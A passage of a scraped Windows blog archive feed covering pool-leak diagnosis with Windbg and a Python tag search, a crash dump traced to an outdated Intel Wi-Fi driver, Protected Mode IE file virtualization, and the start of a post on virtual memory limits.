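    needle = tag.encode("ascii")
    matches = []
    for name in os.listdir(directory):
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            continue
        try:
            with open(path, "rb") as f:
                if needle in f.read():
                    matches.append(name)
        except OSError:
            # Skip files that cannot be opened (locked or access denied).
            continue
    return sorted(matches)


if __name__ == "__main__":
    root = os.environ.get("SystemRoot", r"C:\Windows")
    drivers = os.path.join(root, "System32", "Drivers")
    if os.path.isdir(drivers):
        for name in find_tag_users("Leak", drivers):
            print(name)
```
</PRE>
<P> A four-character tag can appear in an unrelated file by coincidence, so treat each match as a candidate to confirm rather than a verdict. </P> <P>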
Here’s what that process looks like when looking for the driver using “Leak”: </P> <P> <IMG alt="image" border="0" height="263" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121122i2376754ED7DFAB89" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="444" /> </P> <P> If a system has crashed and you suspect that it’s due to pool exhaustion, load the crash dump file into the Windbg debugger, which is included in the Debugging Tools for Windows package, and use the !vm command to confirm it. Here’s the output of !vm on a system where Notmyfault has exhausted nonpaged pool: </P> <P> <IMG alt="image" border="0" height="221" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_15.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121123iA8FB8AA47B1260FB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="434" /> </P> <P> Once you’ve confirmed a leak, use the !poolused command to get a view of pool usage by tag that’s similar to Poolmon’s. 
!poolused by default shows unsorted summary information, so specify 1 as the option to sort by paged pool usage and 2 to sort by nonpaged pool usage: </P> <P> <IMG alt="image" border="0" height="142" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsPool_9AFB/image_thumb_16.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121124i9498129B3F6D6E86" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="344" /> </P> <P> Use Strings on the system where the dump came from to search for the driver using the tag that you find causing the problem. </P> <P> So far in this blog series I’ve covered the most fundamental limits in Windows, including physical memory, virtual memory, paged and nonpaged pool. Next time I’ll talk about the limits for the number of processes and threads that Windows supports, which are limits that derive from these. </P> </BODY></HTML> Thu, 27 Jun 2019 06:51:09 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-paged-and-nonpaged-pool/ba-p/723789 MarkRussinovich 2019-06-27T06:51:09Z The Case of the Crashed Phone Call https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-crashed-phone-call/ba-p/723768 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 30, 2008 </STRONG> <BR /> <P> <A href="#" target="_blank"> David Solomon </A> , my coauthor for the <A href="#" target="_blank"> Windows Internals </A> books, was recently in the middle of an important VOIP call on Skype when the audio suddenly garbled. A second later the system blue screened. He called back after the reboot, but a half hour later the person on the other end seemed to stop talking mid-word and the system crashed again. 
The conversation was essentially over anyway, and since he’d explained the first drop, Dave decided not to call back and formally end the call, but to investigate the cause of the crashes. He launched Windbg from the <A href="#" target="_blank"> Debugging Tools for Windows </A> package, selected Open Crash Dump from the File menu, and chose %Systemroot%\Memory.dmp. </P> <P> He’d previously configured Windbg to use the Microsoft public symbol server by entering “srv*c:\symbols*<A href="#" target="_blank">http://msdl.microsoft.com/download/symbols”</A> in the Windbg symbols configuration dialog, so Windbg knew how to interpret the crash dump file.&nbsp; When Windbg loads a crash dump file, it automatically executes a heuristics-based analysis engine that identifies the driver or system component most likely responsible for the crash. The analysis output pointed at the NETw4v64.sys device driver: </P> <P> <IMG alt="image" border="0" height="159" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_1.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121096iEED8188CDACA3403" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> </P> <P> When you click on the “!analyze –v” hyperlink in the output, Windbg prints out some of the data it uses in its analysis. The analysis heuristics aren’t perfect, so Dave always clicks the link to look at the additional data, specifically the stack trace at the time of the crash and possibly memory locations associated with the crash. The stack trace records the nesting of function calls on the processor from which the kernel’s crash function, <A href="#" target="_blank"> KeBugCheckEx </A> , was called. 
In this case the stack looked like this: </P> <P> <IMG alt="image" border="0" height="89" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_5.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121097i418811BAF75E35EB" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="254" /> </P> <P> You read the stack from bottom to top to follow the chronology of function calls. The trace shows that some code in NETw4v64 called the kernel’s (“nt”) <A href="#" target="_blank"> KeAcquireSpinLockRaiseToDpc </A> function. NETw4v64’s stack frame doesn’t have a text function name, which is expected for drivers that aren’t part of Windows and therefore don’t have symbols on the Microsoft symbol server. The next higher frame indicates that KeAcquireSpinLockRaiseToDpc called KiPageFault, most likely not directly, but as the result of a reference to a virtual memory address that wasn’t currently resident in physical memory. KiPageFault then called KeBugCheckEx with stop code A, which the extended analysis output describes as IRQL_NOT_LESS_OR_EQUAL: </P> <P> <IMG alt="image" border="0" height="145" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_3.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121099i0654361839CC9EDF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> Dave hypothesized that the NETw4v64 driver had called the kernel with a corrupted pointer that triggered the invalid memory reference. 
This particular crash might have been the result of random corruption, even by another driver, so he looked in the %Systemroot%\Minidump directory for the dump file for the first crash. On Windows Vista, the operating system he was running, the system always saves a kernel-memory dump to %Systemroot%\Memory.dmp, overwriting the previous dump, and archives an abbreviated form of the dump, called a minidump, to %Systemroot%\Minidump. He followed the same steps for the second dump and the analysis engine reported the exact same cause for the crash, down to the same corrupted memory pointer value. </P> <P> Without performing a meticulous manual analysis of a dump, you can’t be certain that the driver the heuristics point at is the culprit, but the first rule of crash mitigation is to make sure you have the latest versions of any implicated drivers. Sometimes Windows Update has optional updates that don’t apply automatically, so Dave went to the %Systemroot%\System32\drivers directory to investigate the NETw4v64.sys file for clues as to what device it was for. 
The file properties dialog showed that it was version 11.5 of the “Intel Wireless WiFi Link Driver”: </P> <P> <IMG alt="image" border="0" height="281" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121100i1B9D955F4C06E3D5" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="381" /> </P> <P> Armed with the knowledge that it was an Intel wireless network driver, he opened Device Manager, expanded the Network Adapters node and found a device with a similar name: </P> <P> <IMG alt="image" border="0" height="98" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_7.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121101iEFD2C908E1FD527B" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="310" /> </P> <P> He right-clicked and chose “Update Driver Software…” from the context menu to launch the driver update wizard, and told it to check Windows Update for a newer version. 
Unfortunately, it reported that he had the most current version installed: </P> <P> <IMG alt="image" border="0" height="236" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_8.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121102i1C2FD95F0FEA33BD" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="466" /> </P> <P> Sometimes OEMs have drivers posted on their Web sites that they haven’t yet made available to Windows Update, so Dave next went to Dell, the brand of his laptop, to check the version there. Again, the version he found posted was actually older than the one he had: </P> <P> <IMG alt="image" border="0" height="334" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121103i1393C7AD0D8ED9E8" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="486" /> </P> <P> OEMs often get hardware vendors to create custom versions of hardware tuned for specific cost, power, capability or size requirements. The original hardware vendor will therefore not post drivers for an OEM-only device or post drivers that are generic and might not take advantage of OEM-specific features.&nbsp; It’s always worth checking, though, so Dave went to Intel’s site. 
To his chagrin, not only was there a newer version that installed and worked as expected, but the Intel driver was version 12.1, a major release number higher than the one Dell was hosting: </P> <P> <IMG alt="image" border="0" height="300" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseoftheInterruptedPhoneCall_B31B/image_thumb.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121104i9639E1813DDEFBDF" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> </P> <P> Intel also conveniently offered the driver in a “Drivers-Only” download that was a mere 7MB, one tenth the size of the package on Dell’s site that also includes value-add management software. </P> <P> Dave couldn’t conclusively close the case because he couldn’t be sure that the Intel driver was the actual cause of the crashes, but the crashes haven’t reoccurred. Even if the Intel driver wasn’t the root cause, Dave was happy that he picked up a newer version that most likely had performance, reliability and maybe even power-management improvements. The case is a great example of simple dump analysis and the lesson that Windows Update and even an OEM’s site might not have the most up-to-date drivers. Hopefully, Dell will start leveraging Windows Update to provide its customers the latest drivers. 
</P> </BODY></HTML> Thu, 27 Jun 2019 06:48:53 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-crashed-phone-call/ba-p/723768 MarkRussinovich 2019-06-27T06:48:53Z The Case of the Phantom Desktop Files https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-phantom-desktop-files/ba-p/723757 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Dec 28, 2008 </STRONG> <BR /> <P> A few weeks ago, my wife mentioned that she sometimes saw files in her desktop folder that didn’t appear on the actual desktop. She brought it up not only because she was confused by the discrepancy, but because she wanted to move some of these phantom files to other folders and wanted to delete others. I had no idea what she was talking about (which was usually the case when she described her computer troubles), so I told her to call me the next time she saw these mysterious files so that I could take a look. </P> <P> A few days later I got home from work and she greeted me excitedly at the door and explained that the problem had reoccurred and that she had left a window open showing the elusive files. I rushed to the kitchen computer with anticipation, not even bothering to greet the dogs on the way, and surveyed the situation. She had a maximized IE window open with a full row of tabs for her open emails (I don’t think she ever closes an email window). An IE “Choose a File” dialog box was in the foreground listing the files in her desktop folder, which she had opened by clicking the attachment button in the email editor. 
The dialog looked like this: </P> <P> <IMG alt="image" border="0" height="245" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121090i7240C35E79A22D02" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="420" /> </P> <P> I minimized IE to view the desktop background and sure enough, several of the files visible in the dialog, such as the “Maui Feb. 08” folder and the CIMG13xx JPG files, were missing. I opened an Explorer window and navigated to her desktop folder to see if the files would show up there, but they were missing there as well: </P> <P> <IMG alt="image" border="0" height="265" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121091i502F6EF25A625CBA" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="422" /> </P> <P> I’d never seen that behavior before. I knew this was a job for <A href="#" target="_blank"> Process Monitor </A> . Since my wife doesn’t keep the Sysinternals tools on her system (sad, but true), I ran it directly from the network using the Sysinternals Live address, <A target="_blank"> \\live.sysinternals.com\tools\procmon.exe </A> . With Process Monitor recording activity, I closed and reopened the Choose File dialog from the email editor and then searched for “CIMG”, a portion of the file name for many of the files present in the Choose File dialog, but not in the Explorer view of the desktop. 
The first hit was a directory enumeration operation with the file names showing as results in the Details column on the far right: </P> <P> <IMG alt="image" border="0" height="72" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121092i2DED37C31D135176" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="554" /> </P> <P> The files were located in her profile under \Appdata\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\C\Users\Daryl\Desktop. The Virtualized directory is created by IE7 when run in Protected Mode (PMIE), which is the default mode on Windows Vista and Windows Server 2008. </P> <P> PMIE uses Integrity Levels, introduced in Vista and Server 2008, to limit the file system and registry locations that code running in IE can modify to a subset of those writeable by the user account in which IE executes. As I described in an <A href="#" target="_blank"> earlier blog post </A> , the sandbox, defined by locations labeled with Low Integrity (the level at which PMIE executes and of the objects that it can modify), allows PMIE to save favorites and temporary files, like the IE cache and browsing history. However, PMIE cannot modify other locations in a user’s account, like documents folders and per-user autostart locations in the registry and file system, because they have an integrity level of Medium. That prevents drive-by-download malware that might infect the IE process from establishing a persistent presence. 
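</P> <P> The Virtualized location shown above appears to mirror the original path, with the drive letter turned into an ordinary directory component. As a rough sketch of that mapping (not PMIE's actual code), the Python below rebuilds the virtualized path for a desktop file. The helper name <CODE>virtualized_path</CODE>, the profile root C:\Users\Daryl, and the file name CIMG1301.JPG are assumptions made for illustration; only the relative directory layout comes from the Process Monitor trace. </P>

```python
from pathlib import PureWindowsPath

# Relative location of the Virtualized directory inside a user profile,
# as reported in the Process Monitor trace above.
VIRTUALIZED_SUBDIR = PureWindowsPath(
    r"AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized"
)


def virtualized_path(profile_dir: str, original: str) -> PureWindowsPath:
    """Hypothetical helper: map an absolute path to its Virtualized mirror."""
    orig = PureWindowsPath(original)
    drive_letter = orig.drive.rstrip(":")          # "C:" -> "C"
    # parts[0] is the anchor ("C:\"); the remaining parts are the components.
    relative = PureWindowsPath(*orig.parts[1:])
    return PureWindowsPath(profile_dir) / VIRTUALIZED_SUBDIR / drive_letter / relative


# Illustrative (made-up) file name following the CIMG13xx pattern.
mirror = virtualized_path(r"C:\Users\Daryl", r"C:\Users\Daryl\Desktop\CIMG1301.JPG")
print(mirror)
```

<P> Running the mapping the other way (stripping the Virtualized prefix) is a quick way to tell where a redirected file was originally meant to go. 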
</P> <P> In order to preserve backward compatibility with legacy code, such as ActiveX controls and Browser Helper Objects, that might be coded to write to locations outside of the sandbox, PMIE implements <EM> shims </EM> that intercept file and registry operations and redirect ones that go outside the sandbox to the Virtualized directory within it. </P> <P> To see if that was what was happening here, I examined the stack trace of the virtualized operation highlighted above by right-clicking on the line and choosing Stack. The stack showed that Acredir.dll was intercepting the operation and executing redirection functions: </P> <P> <IMG alt="image" border="0" height="198" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_10.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121093i9CBB0BABB341C6B0" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="391" /> </P> <P> Double-clicking on the line in the stack trace opens the module properties dialog, which shows that the DLL is the “Windows Compatibility DLL”, thus confirming this was part of PMIE’s sandbox implementation: </P> <P> <IMG alt="image" border="0" height="140" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121094i089876EBC5E1858C" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="244" /> </P> <P> I had been familiar with PMIE’s virtualization, but I’d never seen files virtualized on the desktop, so it had not been obvious to me that was what was causing the discrepancy. 
Process Monitor revealed the cause, so now all I was left with was cleaning up the virtualized files. Most users don’t realize that you can move and delete files from within a file browse dialog, so I took the opportunity to show my wife how she can manage virtualized files from the email editor’s attachment dialog if she came across them again. We deleted the files she didn’t want and moved the pictures out to her photo library folders. </P> <P> The case was closed. As a bonus, my wife was impressed at the ease with which I’d figured out the source of the phantom files and even more impressed that I wrote the tool I used to solve it. She’d also gotten an in depth look at PMIE’s virtualization and integrity levels, but I think in the end my lecturing on those subjects actually subtracted points. </P> <P> Incidentally, you’ll almost certainly see files and directories if you look at the PMIE Virtualized folder in your profile, because even routine operations within IE result in redirection. Here you can see thumbnail cache files that the shell’s file browsing dialog creates when you use it from within IE. 
Normally, the shell stores thumbnail cache files in your profile, but PMIE can’t write to that location so the shim virtualizes it: </P> <P> <IMG alt="image" border="0" height="246" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/TheCaseofthePhantomDesktopFiles_4A85/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121095iDB695A46D4C70C81" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="443" /> </P> </BODY></HTML> Thu, 27 Jun 2019 06:47:54 GMT https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/the-case-of-the-phantom-desktop-files/ba-p/723757 MarkRussinovich 2019-06-27T06:47:54Z Pushing the Limits of Windows: Virtual Memory https://gorovian.000webhostapp.com/?exam=t5/windows-blog-archive/pushing-the-limits-of-windows-virtual-memory/ba-p/723750 <HTML> <HEAD></HEAD><BODY> <STRONG> First published on TechNet on Nov 17, 2008 </STRONG> <BR /> <P> In my <A href="#" target="_blank"> first Pushing the Limits of Windows post </A> , I discussed physical memory limits, including the limits imposed by licensing, implementation, and driver compatibility. Here’s the index of the entire Pushing the Limits series. While they can stand on their own, they assume that you read them in order. 
</P> <BLOCKQUOTE> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Physical Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Virtual Memory </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Paged and Nonpaged Pool </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Processes and Threads </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: Handles </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 1 </A> </P> <P> <A href="#" target="_blank"> Pushing the Limits of Windows: USER and GDI Objects – Part 2 </A> </P> </BLOCKQUOTE> <P> This time I’m turning my attention to another fundamental resource, virtual memory. Virtual memory separates a program’s view of memory from the system’s physical memory, so an operating system decides when and if to store the program’s code and data in physical memory and when to store it in a file. The major advantage of virtual memory is that it allows more processes to execute concurrently than might otherwise fit in physical memory. </P> <P> While virtual memory has limits that are related to physical memory limits, virtual memory has limits that derive from different sources and that are different depending on the consumer. For example, there are virtual memory limits that apply to individual processes that run applications, the operating system, and for the system as a whole. It's important to remember as you read this that virtual memory, as the name implies, has no direct connection with physical memory. Windows assigning the file cache a certain amount of virtual memory does not dictate how much file data it actually caches in physical memory; it can be any amount from none to more than the amount that's addressable via virtual memory. 
</P> <H3> Process Address Spaces </H3> <P> Each process has its own virtual memory, called an address space, into which it maps the code that it executes and the data that the code references and manipulates. A 32-bit process uses 32-bit virtual memory address pointers, which creates an absolute upper limit of 4GB (2^32) for the amount of virtual memory that a 32-bit process can address. However, so that the operating system can reference its own code and data and the code and data of the currently-executing process without changing address spaces, the operating system makes its virtual memory visible in the address space of every process. By default, 32-bit versions of Windows split the process address space evenly between the system and the active process, creating a limit of 2GB for each: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121067i95D4CE1B8C0ED06F" width="93" /> </P> <P> Applications might use Heap APIs, the .NET garbage collector, or the C runtime malloc library to allocate virtual memory, but under the hood all of these rely on the <A href="#" target="_blank"> VirtualAlloc </A> API. When an application runs out of address space then VirtualAlloc, and therefore the memory managers layered on top of it, return errors (represented by a NULL address). The Testlimit utility, which I wrote for the <A href="#" target="_blank"> 4th Edition of Windows Internals </A> to demonstrate various Windows limits,&nbsp; calls VirtualAlloc repeatedly until it gets an error when you specify the –r switch. 
Thus, when you run the 32-bit version of Testlimit on 32-bit Windows, it will consume the entire 2GB of its address space: </P> <P> <IMG alt="image" border="0" height="129" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_9.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121068i185FA5558E6E6F08" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="471" /> </P> <P> 2010 MB isn’t quite 2GB, but Testlimit’s other code and data, including its executable and system DLLs, account for the difference. You can see the total amount of address space it’s consumed by looking at its Virtual Size in <A href="#" target="_blank"> Process Explorer </A> : </P> <P> <IMG alt="image" border="0" height="50" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121069iA99B9D52C3DEE722" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="345" /> </P> <P> Some applications, like SQL Server and Active Directory, manage large data structures and perform better the more that they can load into their address space at the same time. 
Windows NT 4 SP3 therefore introduced a boot option, <A href="#" target="_blank"> /3GB </A> , that gives a process 3GB of its 4GB address space by reducing the size of the system address space to 1GB, and Windows XP and Windows Server 2003 introduced the /userva option that moves the split anywhere between 2GB and 3GB: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121070i0F520FE2533518DC" width="93" /> </P> <P> To take advantage of the address space above the 2GB line, however, a process must have the ‘large address space aware’ flag set in its executable image. Access to the additional virtual memory is opt-in because some applications have assumed that they’d be given at most 2GB of the address space. Since the high bit of a pointer referencing an address below 2GB is always zero, they would use the high bit in their pointers as a flag for their own data, clearing it of course before referencing the data. If they ran with a 3GB address space they would inadvertently truncate pointers that have values greater than 2GB, causing program errors including possible data corruption. </P> <P> All Microsoft server products and data intensive executables in Windows are marked with the large address space awareness flag, including Chkdsk.exe, Lsass.exe (which hosts Active Directory services on a domain controller), Smss.exe (the session manager), and Esentutl.exe (the Active Directory Jet database repair tool). 
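</P> <P> The high-bit trick described above is easy to model. The following is a minimal sketch in Python, using plain integers as stand-ins for 32-bit pointers; the helper names <CODE>tag</CODE> and <CODE>untag</CODE> and the two sample addresses are hypothetical. It shows that the flag round-trips for an address below 2GB but silently changes an address that lies between 2GB and 3GB. </P>

```python
HIGH_BIT = 0x80000000   # bit 31: always zero for addresses below 2GB
MASK_32 = 0xFFFFFFFF    # keep values within 32 bits


def tag(pointer: int) -> int:
    """Store an application-defined flag in the pointer's high bit."""
    return (pointer | HIGH_BIT) & MASK_32


def untag(pointer: int) -> int:
    """Clear the high bit before dereferencing, as such applications do."""
    return pointer & ~HIGH_BIT & MASK_32


below_2gb = 0x7FFE0000   # sample address in the default 2GB user range
above_2gb = 0xB0000000   # sample address only reachable with a 3GB user range

round_trip_low = untag(tag(below_2gb))
round_trip_high = untag(tag(above_2gb))

print(hex(round_trip_low))    # same address that went in
print(hex(round_trip_high))   # a different address: the real high bit was lost
```

<P> 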
You can see whether an image has the flag with the Dumpbin utility, which comes with Visual Studio: </P> <P> <IMG alt="image" border="0" height="325" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsofWindowsVirtualMemory_917D/image_thumb_4.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121071iFB8D2643B59D5BE8" style="border-right-width: 0px; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" width="554" /> </P> <P> Testlimit is also marked large-address aware, so if you run it with the –r switch when booted with the 3GB of user address space, you’ll see something like this: </P> <P> <IMG alt="image" border="0" height="126" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_6.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121072i38190EE69260CC9F" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="469" /> </P> <P> Because the address space on 64-bit Windows is much larger than 4GB, something I’ll describe shortly, Windows can give 32-bit processes the maximum 4GB that they can address and use the rest for the operating system’s virtual memory. 
If you run Testlimit on 64-bit Windows, you’ll see it consume the entire 32-bit addressable address space: </P> <P> <IMG alt="image" border="0" height="128" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_11.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121073i6F792A8D53DE6213" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="468" /> </P> <P> 64-bit processes use 64-bit pointers, so their theoretical maximum address space is 16 exabytes (2^64). However, Windows doesn’t divide the address space evenly between the active process and the system, but instead defines a region in the address space for the process and others for various system memory resources, like system page table entries (PTEs), the file cache, and paged and non-paged pools. </P> <P> The size of the process address space is different on IA64 and x64 versions of Windows where the sizes were chosen by balancing what applications need against the memory costs of the overhead (page table pages and translation lookaside buffer - TLB - entries) needed to support the address space. On x64, that’s 8192GB (8TB) and on IA64 it’s 7168GB (7TB - the 1TB difference from x64 comes from the fact that the top level page directory on IA64 reserves slots for Wow64 mappings). On both IA64 and x64 versions of Windows, the size of the various resource address space regions is 128GB (e.g. non-paged pool is assigned 128GB of the address space), with the exception of the file cache, which is assigned 1TB. 
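</P> <P> To put those sizes in proportion, here is a small arithmetic sketch in Python. The constant names are mine; the sizes are the ones quoted above. </P>

```python
GB = 1024**3
TB = 1024 * GB
EB = 1024**2 * TB

THEORETICAL_64BIT = 2**64        # bytes addressable with a 64-bit pointer
X64_USER = 8192 * GB             # process address space on x64
IA64_USER = 7168 * GB            # process address space on IA64
RESOURCE_REGION = 128 * GB       # e.g. non-paged pool
FILE_CACHE_REGION = 1 * TB

# Fraction of the theoretical address space that an x64 process can use.
fraction = X64_USER / THEORETICAL_64BIT

print(THEORETICAL_64BIT // EB, "EB theoretical")
print(X64_USER // TB, "TB on x64,", IA64_USER // TB, "TB on IA64")
print(f"x64 process region is {fraction:.2e} of the full 64-bit space")
```

<P> 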
The address space of a 64-bit process therefore looks something like this: </P> <P> <IMG alt="image" border="0" height="200" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_2.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121074i7440488C8B3F2083" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="90" /> </P> <P> The figure isn’t drawn to scale, because even 8TB, much less 128GB, would be a small sliver. Suffice it to say that like our universe, there’s a lot of emptiness in the address space of a 64-bit process. </P> <P> When you run the 64-bit version of Testlimit (Testlimit64) on 64-bit Windows with the –r switch, you’ll see it consume 8TB, which is the size of the part of the address space it can manage: </P> <P> <IMG alt="image" border="0" height="122" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_12.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121075i1D9942905F21EFC3" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="473" /> </P> <P> <IMG alt="image" border="0" height="47" original-url="http://blogs.technet.com/blogfiles/markrussinovich/WindowsLiveWriter/PushingtheLimitsVIrtualMemory_F6E0/image_thumb_13.png" src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/121076i736D0CADC6F6CFE6" style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="image" width="316" /> </P> <H3> Committed Memory </H3> <P> Testlimit’s –r switch has it reserve virtual memory, but not actually <EM> commit </EM> it. 
